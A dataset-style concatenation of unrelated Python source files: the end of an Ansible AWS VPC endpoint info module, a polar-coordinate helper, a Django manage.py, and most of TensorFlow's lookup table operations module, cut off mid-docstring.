module.exit_json(msg='VpcEndpoint {0} does not exist'.format(module.params.get('vpc_endpoint_ids')), vpc_endpoints=[])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e: # pylint: disable=duplicate-except
module.fail_json_aws(e, msg="Failed to get endpoints")
return dict(vpc_endpoints=[camel_dict_to_snake_dict(result) for result in results])
def main():
argument_spec = dict(
query=dict(choices=['services', 'endpoints'], required=False),
filters=dict(default={}, type='dict'),
vpc_endpoint_ids=dict(type='list', elements='str'),
)
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=True)
# Validate Requirements
try:
connection = module.client('ec2')
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
module.fail_json_aws(e, msg='Failed to connect to AWS')
query = module.params.get('query')
if query == 'endpoints':
module.deprecate('The query option has been deprecated and'
' will be removed after 2022-12-01. Searching for'
' `endpoints` is now the default and after'
' 2022-12-01 this module will only support fetching'
' endpoints.',
date='2022-12-01', collection_name='amazon.aws')
elif query == 'services':
module.deprecate('Support for fetching service information with this '
'module has been deprecated and will be removed after'
' 2022-12-01. '
'Please use the ec2_vpc_endpoint_service_info module '
'instead.', date='2022-12-01',
collection_name='amazon.aws')
else:
query = 'endpoints'
invocations = {
'services': get_supported_services,
'endpoints': get_endpoints,
}
results = invocations[query](connection, module)
module.exit_json(**results)
if __name__ == '__main__':
main()
|
py | b415228c2b3d730c6fd2d08d0aae93c71e0bfe57 | import math
from typing import Tuple
def polar2cartesian(radius: float, angle: float, center: Tuple[float, float] = (0, 0)) -> Tuple[float, float]:
x0, y0 = center
return x0 + radius * math.cos(angle), y0 + radius * math.sin(angle) |
py | b41522c7d680ffa22ce1abb4d60ce92406c904ec | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local')
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
py | b415235b994c01ac7b0e5c9950aa7a8a16b525dd | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Lookup table operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.training.saver import BaseSaverBuilder
from tensorflow.python.util import compat
from tensorflow.python.util.deprecation import deprecated
class LookupInterface(object):
"""Represent a lookup table that persists across different steps."""
def __init__(self, key_dtype, value_dtype, name):
"""Construct a lookup table interface.
Args:
key_dtype: The table key type.
value_dtype: The table value type.
name: A name for the operation (optional).
"""
self._key_dtype = dtypes.as_dtype(key_dtype)
self._value_dtype = dtypes.as_dtype(value_dtype)
self._name = name
@property
def key_dtype(self):
"""The table key dtype."""
return self._key_dtype
@property
def value_dtype(self):
"""The table value dtype."""
return self._value_dtype
@property
def name(self):
"""The name of the table."""
return self._name
@property
def init(self):
"""The table initialization op."""
raise NotImplementedError
def size(self, name=None):
"""Compute the number of elements in this table."""
raise NotImplementedError
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values."""
raise NotImplementedError
def check_table_dtypes(self, key_dtype, value_dtype):
"""Check that the given key_dtype and value_dtype matches the table dtypes.
Args:
key_dtype: The key data type to check.
value_dtype: The value data type to check.
Raises:
TypeError: when 'key_dtype' or 'value_dtype' doesn't match the table data
types.
"""
if key_dtype != self.key_dtype:
raise TypeError("Invalid key dtype, expected %s but got %s." %
(self.key_dtype, key_dtype))
if value_dtype != self.value_dtype:
raise TypeError("Invalid value dtype, expected %s but got %s." %
(self.value_dtype, value_dtype))
class InitializableLookupTableBase(LookupInterface):
"""Initializable lookup table interface.
An initializable lookup tables persist across different steps.
"""
def __init__(self, table_ref, default_value, initializer):
"""Construct a table object from a table reference.
If requires a table initializer object (subclass of `TableInitializerBase`).
It provides the table key and value types, as well as the op to initialize
the table. The caller is responsible to execute the initialization op.
Args:
table_ref: The table reference, i.e. the output of the lookup table ops.
default_value: The value to use if a key is missing in the table.
initializer: The table initializer to use.
"""
super(InitializableLookupTableBase, self).__init__(
initializer.key_dtype, initializer.value_dtype,
table_ref.op.name.split("/")[-1])
self._table_ref = table_ref
self._default_value = ops.convert_to_tensor(default_value,
dtype=self._value_dtype)
self._default_value.get_shape().merge_with(tensor_shape.scalar())
self._init = initializer.initialize(self)
@property
def table_ref(self):
"""Get the underlying table reference."""
return self._table_ref
@property
def default_value(self):
"""The default value of the table."""
return self._default_value
@property
def init(self):
"""The table initialization op."""
return self._init
def size(self, name=None):
"""Compute the number of elements in this table.
Args:
name: A name for the operation (optional).
Returns:
A scalar tensor containing the number of elements in this table.
"""
with ops.name_scope(name, "%s_Size" % self._name,
[self._table_ref]) as scope:
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_size(self._table_ref, name=scope)
# pylint: enable=protected-access
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values.
The `default_value` is used for keys not present in the table.
Args:
keys: Keys to look up. May be either a `SparseTensor` or dense `Tensor`.
name: A name for the operation (optional).
Returns:
A `SparseTensor` if keys are sparse, otherwise a dense `Tensor`.
Raises:
TypeError: when `keys` or `default_value` doesn't match the table data
types.
"""
key_tensor = keys
if isinstance(keys, sparse_tensor.SparseTensor):
key_tensor = keys.values
if keys.dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
with ops.name_scope(
name, "%s_Lookup" % self._name,
(self._table_ref, key_tensor, self._default_value)) as scope:
# pylint: disable=protected-access
values = gen_lookup_ops._lookup_table_find(
self._table_ref, key_tensor, self._default_value, name=scope)
# pylint: enable=protected-access
values.set_shape(key_tensor.get_shape())
if isinstance(keys, sparse_tensor.SparseTensor):
return sparse_tensor.SparseTensor(keys.indices, values, keys.dense_shape)
else:
return values
class HashTable(InitializableLookupTableBase):
"""A generic hash table implementation.
Example usage:
```python
table = tf.contrib.lookup.HashTable(
tf.contrib.lookup.KeyValueTensorInitializer(keys, values), -1)
out = table.lookup(input_tensor).
table.init.run()
print out.eval()
```
"""
def __init__(self, initializer, default_value, shared_name=None, name=None):
"""Creates a non-initialized `HashTable` object.
Creates a table, the type of its keys and values are specified by the
initializer.
Before using the table you will have to initialize it. After initialization
the table will be immutable.
Args:
initializer: The table initializer to use. See `HashTable` kernel for
supported key and value types.
default_value: The value to use if a key is missing in the table.
shared_name: If non-empty, this table will be shared under
the given name across multiple sessions.
name: A name for the operation (optional).
Returns:
A `HashTable` object.
"""
with ops.name_scope(
name, "hash_table", (initializer, default_value)) as scope:
# pylint: disable=protected-access
table_ref = gen_lookup_ops._hash_table(
shared_name=shared_name,
key_dtype=initializer.key_dtype,
value_dtype=initializer.value_dtype,
name=scope)
# pylint: enable=protected-access
super(HashTable, self).__init__(table_ref, default_value, initializer)
class TableInitializerBase(object):
"""Base class for lookup table initializers."""
def __init__(self, key_dtype, value_dtype):
"""Construct a table initializer object.
Args:
key_dtype: Type of the table keys.
value_dtype: Type of the table values.
"""
self._key_dtype = dtypes.as_dtype(key_dtype)
self._value_dtype = dtypes.as_dtype(value_dtype)
@property
def key_dtype(self):
"""The expected table key dtype."""
return self._key_dtype
@property
def value_dtype(self):
"""The expected table value dtype."""
return self._value_dtype
def initialize(self, table):
"""Returns the table initialization op."""
raise NotImplementedError
class KeyValueTensorInitializer(TableInitializerBase):
"""Table initializers given `keys` and `values` tensors."""
def __init__(self, keys, values, key_dtype=None, value_dtype=None, name=None):
"""Constructs a table initializer object based on keys and values tensors.
Args:
keys: The tensor for the keys.
values: The tensor for the values.
key_dtype: The `keys` data type. Used when `keys` is a python array.
value_dtype: The `values` data type. Used when `values` is a python array.
name: A name for the operation (optional).
"""
with ops.name_scope(name, "key_value_init", [keys, values]) as scope:
self._keys = ops.convert_to_tensor(keys, dtype=key_dtype, name="keys")
self._values = ops.convert_to_tensor(values,
dtype=value_dtype,
name="values")
self._name = scope
super(KeyValueTensorInitializer, self).__init__(self._keys.dtype,
self._values.dtype)
def initialize(self, table):
"""Initializes the given `table` with `keys` and `values` tensors.
Args:
table: The table to initialize.
Returns:
The operation that initializes the table.
Raises:
TypeError: when the keys and values data types do not match the table
key and value data types.
"""
table.check_table_dtypes(self._keys.dtype, self._values.dtype)
with ops.name_scope(
self._name,
values=(table.table_ref, self._keys, self._values)) as scope:
# pylint: disable=protected-access
init_op = gen_lookup_ops._initialize_table(
table.table_ref, self._keys, self._values, name=scope)
# pylint: enable=protected-access
ops.add_to_collection(ops.GraphKeys.TABLE_INITIALIZERS, init_op)
return init_op
class TextFileIndex(object):
WHOLE_LINE = -2
LINE_NUMBER = -1
class TextFileInitializer(TableInitializerBase):
"""Table initializers from a text file.
This initializer assigns one entry in the table for each line in the file.
The key and value type of the table to initialize is given by `key_dtype` and
`value_dtype`.
The key and value content to get from each line is specified by
the `key_index` and `value_index`.
* `TextFileIndex.LINE_NUMBER` means use the line number starting from zero,
expects data type int64.
* `TextFileIndex.WHOLE_LINE` means use the whole line content, expects data
type string.
* A value `>=0` means use the index (starting at zero) of the split line based
on `delimiter`.
For example if we have a file with the following content:
```
emerson 10
lake 20
palmer 30
```
The following snippet initializes a table with the first column as keys and
second column as values:
* `emerson -> 10`
* `lake -> 20`
* `palmer -> 30`
```python
table = tf.contrib.lookup.HashTable(tf.contrib.lookup.TextFileInitializer(
"test.txt", tf.string, 0, tf.int64, 1, delimiter=" "), -1)
...
table.init.run()
```
Similarly to initialize the whole line as keys and the line number as values.
* `emerson 10 -> 0`
* `lake 20 -> 1`
* `palmer 30 -> 2`
```python
table = tf.contrib.lookup.HashTable(tf.contrib.lookup.TextFileInitializer(
"test.txt", tf.string, tf.contrib.lookup.TextFileIndex.WHOLE_LINE,
tf.int64, tf.contrib.lookup.TextFileIndex.LINE_NUMBER, delimiter=" "), -1)
...
table.init.run()
```
"""
def __init__(self,
filename,
key_dtype,
key_index,
value_dtype,
value_index,
vocab_size=None,
delimiter="\t",
name=None):
"""Constructs a table initializer object to populate from a text file.
It generates one key-value pair per line. The type of table key and
value are specified by `key_dtype` and `value_dtype`, respectively.
Similarly the content of the key and value are specified by the key_index
and value_index.
- TextFileIndex.LINE_NUMBER means use the line number starting from zero,
expects data type int64.
- TextFileIndex.WHOLE_LINE means use the whole line content, expects data
type string.
- A value >=0 means use the index (starting at zero) of the split line based
on `delimiter`.
Args:
filename: The filename of the text file to be used for initialization.
The path must be accessible from wherever the graph is initialized
(eg. trainer or eval workers). The filename may be a scalar `Tensor`.
key_dtype: The `key` data type.
key_index: the index that represents information of a line to get the
table 'key' values from.
value_dtype: The `value` data type.
value_index: the index that represents information of a line to get the
table 'value' values from.'
vocab_size: The number of elements in the file, if known.
delimiter: The delimiter to separate fields in a line.
name: A name for the operation (optional).
Raises:
ValueError: when the filename is empty, or when the table key and value
data types do not match the expected data types.
"""
if not isinstance(filename, ops.Tensor) and not filename:
raise ValueError("Filename required for %s." % name)
key_dtype = dtypes.as_dtype(key_dtype)
value_dtype = dtypes.as_dtype(value_dtype)
if key_index < -2:
raise ValueError("Invalid key index %s." % (key_index))
if key_index == TextFileIndex.LINE_NUMBER and key_dtype != dtypes.int64:
raise ValueError("Signature mismatch. Keys must be dtype %s, got %s." %
(dtypes.int64, key_dtype))
if ((key_index == TextFileIndex.WHOLE_LINE) and
(not key_dtype.is_integer) and (key_dtype != dtypes.string)):
raise ValueError(
"Signature mismatch. Keys must be integer or string, got %s." %
key_dtype)
if value_index < -2:
raise ValueError("Invalid value index %s." % (value_index))
if value_index == TextFileIndex.LINE_NUMBER and value_dtype != dtypes.int64:
raise ValueError("Signature mismatch. Values must be dtype %s, got %s." %
(dtypes.int64, value_dtype))
if value_index == TextFileIndex.WHOLE_LINE and value_dtype != dtypes.string:
raise ValueError("Signature mismatch. Values must be dtype %s, got %s." %
(dtypes.string, value_dtype))
if (vocab_size is not None) and (vocab_size <= 0):
raise ValueError("Invalid vocab_size %s." % vocab_size)
self._filename = filename
self._key_index = key_index
self._value_index = value_index
self._vocab_size = vocab_size
self._delimiter = delimiter
self._name = name
super(TextFileInitializer, self).__init__(key_dtype, value_dtype)
def initialize(self, table):
"""Initializes the table from a text file.
Args:
table: The table to be initialized.
Returns:
The operation that initializes the table.
Raises:
TypeError: when the keys and values data types do not match the table
key and value data types.
"""
table.check_table_dtypes(self.key_dtype, self.value_dtype)
with ops.name_scope(
self._name, "text_file_init", (table.table_ref,)) as scope:
filename = ops.convert_to_tensor(self._filename,
dtypes.string,
name="asset_filepath")
# pylint: disable=protected-access
init_op = gen_lookup_ops._initialize_table_from_text_file(
table.table_ref,
filename,
self._key_index,
self._value_index,
-1 if self._vocab_size is None else self._vocab_size,
self._delimiter,
name=scope)
# pylint: enable=protected-access
ops.add_to_collection(ops.GraphKeys.TABLE_INITIALIZERS, init_op)
ops.add_to_collection(ops.GraphKeys.ASSET_FILEPATHS, filename)
return init_op
class TextFileStringTableInitializer(TextFileInitializer):
"""Table initializer for `int64` IDs to string tables from a text file."""
def __init__(self,
filename,
key_column_index=TextFileIndex.LINE_NUMBER,
value_column_index=TextFileIndex.WHOLE_LINE,
vocab_size=None,
delimiter="\t",
name="text_file_string_table_init"):
"""Constructs an initializer for an id-to-string table from a text file.
It populates a table that its key and value types are int64 and string,
respectively. It generates one key-value pair per line.
The content of the key and value are specified by `key_column_index`
and `value_column_index`.
- TextFileIndex.LINE_NUMBER means use the line number starting from zero,
expects data type int64.
- TextFileIndex.WHOLE_LINE means use the whole line content, expects data
type string.
- A value >=0 means use the index (starting at zero) of the split line based
on `delimiter`.
Args:
filename: The filename of the text file to be used for initialization.
The path must be accessible from wherever the graph is initialized
(eg. trainer or eval workers). The filename may be a scalar `Tensor`.
key_column_index: The column index from the text file to get the keys
from. The default is 0 that represents the whole line content.
value_column_index: The column index from the text file to get the
values from. The default is to use the line number, starting from zero.
vocab_size: The number of elements in the file, if known.
delimiter: The delimiter to separate fields in a line.
name: Optional name for the op.
Raises:
TypeError: when the filename is empty, or when the table key and value
data types do not match the expected data types.
"""
super(TextFileStringTableInitializer, self).__init__(filename,
dtypes.int64,
key_column_index,
dtypes.string,
value_column_index,
vocab_size=vocab_size,
delimiter=delimiter,
name=name)
class TextFileIdTableInitializer(TextFileInitializer):
"""Table initializer for string to `int64` IDs tables from a text file."""
def __init__(self,
filename,
key_column_index=TextFileIndex.WHOLE_LINE,
value_column_index=TextFileIndex.LINE_NUMBER,
vocab_size=None,
delimiter="\t",
name="text_file_id_table_init",
key_dtype=dtypes.string):
"""Constructs an initializer for an string-to-id table from a text file.
It populates a table that its key and value types are string and int64,
respectively. It generates one key-value pair per line.
The content of the key and value are specified by the key_index
and value_index.
- TextFileIndex.LINE_NUMBER means use the line number starting from zero,
expects data type int64.
- TextFileIndex.WHOLE_LINE means use the whole line content, expects data
type string.
- A value >=0 means use the index (starting at zero) of the split line based
on `delimiter`.
Args:
filename: The filename of the text file to be used for initialization.
The path must be accessible from wherever the graph is initialized
(eg. trainer or eval workers). The filename may be a scalar `Tensor`.
key_column_index: The column index from the text file to get the `key`
values from. The default is to use the line number, starting from zero.
value_column_index: The column index from the text file ro get the `value`
values from. The default is 0 that represents the whole line content.
vocab_size: The number of elements in the file, if known.
delimiter: The delimiter to separate fields in a line.
name: Optional name for the op.
key_dtype: The `key` data type.
Raises:
TypeError: when the filename is empty, or when the table key and value
data types do not match the expected data types.
"""
super(TextFileIdTableInitializer, self).__init__(filename,
key_dtype,
key_column_index,
dtypes.int64,
value_column_index,
vocab_size=vocab_size,
delimiter=delimiter,
name=name)
class HasherSpec(collections.namedtuple("HasherSpec", ["hasher", "key"])):
"""A structure for the spec of the hashing function to use for hash buckets.
`hasher` is the name of the hashing function to use (eg. "fasthash",
"stronghash").
`key` is optional and specify the key to use for the hash function if
supported, currently only used by a strong hash.
Fields:
hasher: The hasher name to use.
key: The key to be used by the hashing function, if required.
"""
__slots__ = ()
FastHashSpec = HasherSpec("fasthash", None) # pylint: disable=invalid-name
class StrongHashSpec(HasherSpec):
"""A structure to specify a key of the strong keyed hash spec.
The strong hash requires a `key`, which is a list of 2 unsigned integer
numbers. These should be non-zero; random numbers generated from random.org
would be a fine choice.
Fields:
key: The key to be used by the keyed hashing function.
"""
__slots__ = ()
def __new__(cls, key):
if len(key) != 2:
raise ValueError("key must have size 2, got %s." % len(key))
if not isinstance(key[0], compat.integral_types) or not isinstance(
key[1], compat.integral_types):
raise TypeError("Invalid key %s. Must be unsigned integer values." % key)
return super(cls, StrongHashSpec).__new__(cls, "stronghash", key)
def _as_string(tensor):
if dtypes.string == tensor.dtype.base_dtype:
return tensor
return string_ops.as_string(tensor)
class IdTableWithHashBuckets(LookupInterface):
"""String to Id table wrapper that assigns out-of-vocabulary keys to buckets.
For example, if an instance of `IdTableWithHashBuckets` is initialized with a
string-to-id table that maps:
- emerson -> 0
- lake -> 1
- palmer -> 2
The `IdTableWithHashBuckets` object will performs the following mapping:
- emerson -> 0
- lake -> 1
- palmer -> 2
- <other term> -> bucket id between 3 and 3 + num_oov_buckets, calculated by:
hash(<term>) % num_oov_buckets + vocab_size
If input_tensor is ["emerson", "lake", "palmer", "king", "crimson"],
the lookup result is [0, 1, 2, 4, 7]
If `table` is None, only out-of-vocabulary buckets are used.
Example usage:
```python
num_oov_buckets = 3
input_tensor = tf.constant(["emerson", "lake", "palmer", "king", "crimnson"])
table = tf.IdTableWithHashBuckets(
tf.HashTable(tf.TextFileIdTableInitializer(filename), default_value),
num_oov_buckets)
out = table.lookup(input_tensor).
table.init.run()
print out.eval()
```
The hash function used for generating out-of-vocabulary buckets ID is handled
by `hasher_spec`.
"""
def __init__(self,
table,
num_oov_buckets,
hasher_spec=FastHashSpec,
name=None,
key_dtype=None):
"""Construct a `IdTableWithHashBuckets` object.
Args:
table: Table that maps `tf.string` or `tf.int64` keys to `tf.int64` ids.
num_oov_buckets: Number of buckets to use for out-of-vocabulary keys.
hasher_spec: A `HasherSpec` to specify the hash function to use for
assignation of out-of-vocabulary buckets (optional).
name: A name for the operation (optional).
key_dtype: Data type of keys passed to `lookup`. Defaults to
`table.key_dtype` if `table` is specified, otherwise `tf.string`.
Must be string or integer, and must be castable to `table.key_dtype`.
Raises:
ValueError: when `table` in None and `num_oov_buckets` is not positive.
TypeError: when `hasher_spec` is invalid.
"""
# If a name ends with a '/' it is a "name scope", remove all trailing '/'
# characters to use as table name.
if name:
name = name.rstrip("/")
if table:
if key_dtype is None:
key_dtype = table.key_dtype
supported_table_key_dtypes = (dtypes.int64, dtypes.string)
if table.key_dtype not in supported_table_key_dtypes:
raise TypeError("Invalid key dtype, expected one of %s, but got %s." %
(supported_table_key_dtypes, key_dtype))
if table.key_dtype.is_integer != key_dtype.is_integer:
raise TypeError("Invalid key dtype, expected %s but got %s." %
("integer" if key_dtype.is_integer else "non-integer",
table.key_dtype))
if table.value_dtype != dtypes.int64:
raise TypeError("Invalid value dtype, expected %s but got %s." %
(dtypes.int64, table.value_dtype))
self._table = table
name = name or self._table.name
else:
if num_oov_buckets <= 0:
raise ValueError("oov_buckets must be > 0 if no table is supplied.")
key_dtype = dtypes.string if key_dtype is None else key_dtype
self._table = None
name = name or "hash_bucket"
if (not key_dtype.is_integer) and (dtypes.string != key_dtype):
raise TypeError(
"Invalid key_dtype, expected integer or string, got %s." % key_dtype)
self._num_oov_buckets = num_oov_buckets
if not isinstance(hasher_spec, HasherSpec):
raise TypeError("hasher_spec must be of type HasherSpec, got %s" %
hasher_spec)
self._hasher_spec = hasher_spec
super(IdTableWithHashBuckets, self).__init__(key_dtype, dtypes.int64,
name.split("/")[-1])
@property
def init(self):
"""The table initialization op."""
if self._table:
return self._table.init
with ops.name_scope(None, "init"):
return control_flow_ops.no_op()
def size(self, name=None):
"""Compute the number of elements in this table."""
with ops.name_scope(name, "%s_Size" % self.name) as scope:
if self._table:
tsize = self._table.size(scope)
else:
tsize = ops.convert_to_tensor(0, dtype=dtypes.int64)
return tsize + self._num_oov_buckets
def _get_string_to_hash_bucket_fn(self, hasher_spec):
"""Returns the string_to_hash_bucket op to use based on `hasher_spec`."""
if not isinstance(hasher_spec, HasherSpec):
raise TypeError("hasher_spec must be of type HasherSpec %s" % hasher_spec)
if hasher_spec.hasher == "fasthash":
return string_ops.string_to_hash_bucket_fast
if hasher_spec.hasher == "legacy":
return string_ops.string_to_hash_bucket
if hasher_spec.hasher == "stronghash":
return functools.partial(
string_ops.string_to_hash_bucket_strong, key=hasher_spec.key)
raise ValueError("Unknown hasher %s" % hasher_spec.hasher)
def lookup(self, keys, name=None):
"""Looks up `keys` in the table, outputs the corresponding values.
It assigns out-of-vocabulary keys to buckets based in their hashes.
Args:
keys: Keys to look up. May be either a `SparseTensor` or dense `Tensor`.
name: Optional name for the op.
Returns:
A `SparseTensor` if keys are sparse, otherwise a dense `Tensor`.
Raises:
TypeError: when `keys` doesn't match the table key data type.
"""
if keys.dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
values = keys
if isinstance(keys, sparse_tensor.SparseTensor):
values = keys.values
if self._table and (self._table.key_dtype.base_dtype == dtypes.int64):
values = math_ops.to_int64(values)
if self._num_oov_buckets == 0:
ids = self._table.lookup(values, name=name)
else:
# TODO(yleon): Consider moving this functionality to its own kernel.
with ops.name_scope(name, "%s_Lookup" % self.name) as scope:
str_to_hash_bucket = self._get_string_to_hash_bucket_fn(
self._hasher_spec)
buckets = str_to_hash_bucket(
_as_string(values),
num_buckets=self._num_oov_buckets,
name="hash_bucket")
if self._table:
ids = self._table.lookup(values)
buckets = math_ops.add(buckets, self._table.size())
is_id_non_default = math_ops.not_equal(ids, self._table.default_value)
ids = array_ops.where(is_id_non_default, ids, buckets, name=scope)
else:
ids = buckets
if isinstance(keys, sparse_tensor.SparseTensor):
return sparse_tensor.SparseTensor(keys.indices, ids, keys.dense_shape)
return ids
@deprecated("2017-04-10", "Use `index_table_from_file`.")
def string_to_index_table_from_file(vocabulary_file=None,
num_oov_buckets=0,
vocab_size=None,
default_value=-1,
hasher_spec=FastHashSpec,
name=None):
return index_table_from_file(
vocabulary_file, num_oov_buckets, vocab_size, default_value, hasher_spec,
key_dtype=dtypes.string, name=name)
def index_table_from_file(vocabulary_file=None,
num_oov_buckets=0,
vocab_size=None,
default_value=-1,
hasher_spec=FastHashSpec,
key_dtype=dtypes.string,
name=None):
"""Returns a lookup table that converts a string tensor into int64 IDs.
This operation constructs a lookup table to convert tensor of strings into
int64 IDs. The mapping can be initialized from a vocabulary file specified in
`vocabulary_file`, where the whole line is the key and the zero-based line
number is the ID.
Any lookup of an out-of-vocabulary token will return a bucket ID based on its
hash if `num_oov_buckets` is greater than zero. Otherwise it is assigned the
`default_value`.
The bucket ID range is `[vocabulary size, vocabulary size + num_oov_buckets]`.
The underlying table must be initialized by calling
`tf.tables_initializer.run()` or `table.init.run()` once.
Sample Usages:
If we have a vocabulary file "test.txt" with the following content:
```
emerson
lake
palmer
```
```python
features = tf.constant(["emerson", "lake", "and", "palmer"])
table = tf.contrib.lookup.index_table_from_file(
vocabulary_file="test.txt", num_oov_buckets=1)
ids = table.lookup(features)
...
tf.tables_initializer().run()
ids.eval() ==> [0, 1, 3, 2] # where 3 is the out-of-vocabulary bucket
```
Args:
vocabulary_file: The vocabulary filename.
num_oov_buckets: The number of out-of-vocabulary buckets.
vocab_size: Number of the elements in the vocabulary, if known.
default_value: The value to use for out-of-vocabulary feature values.
Defaults to -1.
hasher_spec: A `HasherSpec` to specify the hash function to use for
assignation of out-of-vocabulary buckets.
key_dtype: The `key` data type.
name: A name for this op (optional).
Returns:
The lookup table to map a `key_dtype` `Tensor` to index `int64` `Tensor`.
Raises:
ValueError: If `vocabulary_file` is not set.
ValueError: If `num_oov_buckets` is negative or `vocab_size` is not greater
than zero.
"""
if not vocabulary_file:
raise ValueError("vocabulary_file must be specified.")
if num_oov_buckets < 0:
raise ValueError("num_oov_buckets must be greater or equal than 0, got %d."
% num_oov_buckets)
if vocab_size is not None and vocab_size < 1:
raise ValueError("vocab_size must be greater than 0, got %d." % vocab_size)
if (not key_dtype.is_integer) and (dtypes.string != key_dtype.base_dtype):
raise TypeError("Only integer and string keys are supported.")
with ops.name_scope(name, "string_to_index") as feat_to_id_scope:
table = None
shared_name = ""
with ops.name_scope(None, "hash_table") as hash_table_scope:
if vocab_size:
# Keep the shared_name:
# <table_type>_<filename>_<vocab_size>_<key_index>_<value_index>
shared_name = "hash_table_%s_%d_%s_%s" % (vocabulary_file, vocab_size,
TextFileIndex.WHOLE_LINE,
TextFileIndex.LINE_NUMBER)
else:
# Keep the shared_name
# <table_type>_<filename>_<key_index>_<value_index>
shared_name = "hash_table_%s_%s_%s" % (vocabulary_file,
TextFileIndex.WHOLE_LINE,
TextFileIndex.LINE_NUMBER)
init = TextFileIdTableInitializer(
vocabulary_file, vocab_size=vocab_size,
key_dtype=dtypes.int64 if key_dtype.is_integer else key_dtype,
name="table_init")
table = HashTable(
init, default_value, shared_name=shared_name, name=hash_table_scope)
if num_oov_buckets:
table = IdTableWithHashBuckets(
table,
num_oov_buckets=num_oov_buckets,
hasher_spec=hasher_spec,
name=feat_to_id_scope,
key_dtype=key_dtype)
return table
@deprecated("2017-04-10", "Use `index_table_from_tensor`.")
def string_to_index_table_from_tensor(mapping,
num_oov_buckets=0,
default_value=-1,
hasher_spec=FastHashSpec,
name=None):
with ops.name_scope(name, "string_to_index") as scope:
mapping = ops.convert_to_tensor(mapping)
if dtypes.string != mapping.dtype.base_dtype:
raise ValueError("string_to_index_table_from_tensor requires string.")
return index_table_from_tensor(
mapping, num_oov_buckets, default_value, hasher_spec, name=scope)
def index_table_from_tensor(mapping,
num_oov_buckets=0,
default_value=-1,
hasher_spec=FastHashSpec,
dtype=dtypes.string,
name=None):
"""Returns a lookup table that converts a string tensor into int64 IDs.
This operation constructs a lookup table to convert tensor of strings into
int64 IDs. The mapping can be initialized from a string `mapping` 1-D tensor
where each element is a key and corresponding index within the tensor is the
value.
Any lookup of an out-of-vocabulary token will return a bucket ID based on its
hash if `num_oov_buckets` is greater than zero. Otherwise it is assigned the
`default_value`.
The bucket ID range is `[mapping size, mapping size + num_oov_buckets]`.
The underlying table must be initialized by calling
`tf.tables_initializer.run()` or `table.init.run()` once.
Elements in `mapping` cannot have duplicates, otherwise when executing the
table initializer op, it will throw a `FailedPreconditionError`.
Sample Usages:
```python
mapping_strings = t.constant(["emerson", "lake", "palmer"])
table = tf.contrib.lookup.index_table_from_tensor(
mapping=mapping_strings, num_oov_buckets=1, default_value=-1)
features = tf.constant(["emerson", "lake", "and", "palmer"])
ids = table.lookup(features)
...
tf.tables_initializer().run()
ids.eval() ==> [0, 1, 4, 2]
```
Args:
mapping: A 1-D `Tensor` that specifies the mapping of keys to indices. The
type of this object must be castable to `dtype`.
num_oov_buckets: The number of out-of-vocabulary buckets.
default_value: The value to use for out-of-vocabulary feature values.
Defaults to -1.
hasher_spec: A `HasherSpec` to specify the hash function to use for
assignment of out-of-vocabulary buckets.
dtype: The type of values passed to `lookup`. Only string and integers are
supported.
name: A name for this op (optional).
Returns:
The lookup table to map an input `Tensor` to index `int64` `Tensor`.
Raises:
ValueError: If `mapping` is invalid.
ValueError: If `num_oov_buckets` is negative.
"""
if mapping is None:
raise ValueError("mapping must be specified.")
if num_oov_buckets < 0:
raise ValueError("num_oov_buckets must be greater or equal than 0, got %d."
% num_oov_buckets)
if (not dtype.is_integer) and (dtypes.string != dtype.base_dtype):
raise TypeError("Only integer and string keys are supported.")
with ops.name_scope(name, "string_to_index") as feat_to_id_scope:
keys = ops.convert_to_tensor(mapping)
if keys.dtype.is_integer != dtype.is_integer:
raise ValueError("Expected %s, got %s." % (
"integer" if dtype.is_integer else "non-integer", keys.dtype))
if (not dtype.is_integer) and (keys.dtype.base_dtype != dtype):
raise ValueError("Expected %s, got %s." % (dtype, keys.dtype))
num_elements = array_ops.size(keys)
values = math_ops.to_int64(math_ops.range(num_elements))
shared_name = ""
with ops.name_scope(None, "hash_table") as hash_table_scope:
table_keys = math_ops.to_int64(keys) if keys.dtype.is_integer else keys
init = KeyValueTensorInitializer(
table_keys, values, table_keys.dtype.base_dtype, dtypes.int64,
name="table_init")
table = HashTable(
init, default_value, shared_name=shared_name, name=hash_table_scope)
if num_oov_buckets:
table = IdTableWithHashBuckets(
table,
num_oov_buckets=num_oov_buckets,
hasher_spec=hasher_spec,
name=feat_to_id_scope,
key_dtype=dtype)
return table
@deprecated(
"2017-01-07", "This op will be removed after the deprecation date. "
"Please switch to index_table_from_tensor and call the lookup "
"method of the returned table.")
def string_to_index(tensor, mapping, default_value=-1, name=None):
"""Maps `tensor` of strings into `int64` indices based on `mapping`.
This operation converts `tensor` of strings into `int64` indices.
The mapping is initialized from a string `mapping` tensor where each element
is a key and corresponding index within the tensor is the value.
Any entry in the input which does not have a corresponding entry in 'mapping'
(an out-of-vocabulary entry) is assigned the `default_value`
Elements in `mapping` cannot be duplicated, otherwise the initialization
will throw a FailedPreconditionError.
The underlying table must be initialized by calling
